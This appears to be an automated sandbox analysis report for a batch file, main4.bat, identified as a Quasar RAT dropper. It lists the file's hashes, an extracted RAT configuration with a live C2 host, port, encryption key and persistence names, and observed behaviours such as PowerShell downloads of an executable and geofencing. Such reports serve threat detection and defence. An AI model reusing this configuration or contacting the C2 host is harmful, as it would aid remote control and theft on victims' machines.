General

  • Target

    main4.bat

  • Size

    17KB

  • Sample

    241122-dk5qqayrdr

  • MD5

    d2c79d02019fe6507207e4d57360c2d0

  • SHA1

    58c6e205d730b3cdb1186d9c8618c891e6ddbcde

  • SHA256

    900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4

  • SHA512

    20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610

  • SSDEEP

    192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes
  • encryption_key

    E83D6FC31962786DAEA703F111D2381786DF06CA

  • install_name

    Modification1.5.14.12.exe

  • log_directory

    Logs

  • reconnect_delay

    3126

  • startup_key

    explorer.dll

  • subdirectory

    SubDir

Targets

    • Target

      main4.bat

    • Size

      17KB

    • MD5

      d2c79d02019fe6507207e4d57360c2d0

    • SHA1

      58c6e205d730b3cdb1186d9c8618c891e6ddbcde

    • SHA256

      900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4

    • SHA512

      20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610

    • SSDEEP

      192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh

    • Quasar RAT

      Quasar is an open source Remote Access Tool.

    • Quasar family

    • Quasar payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks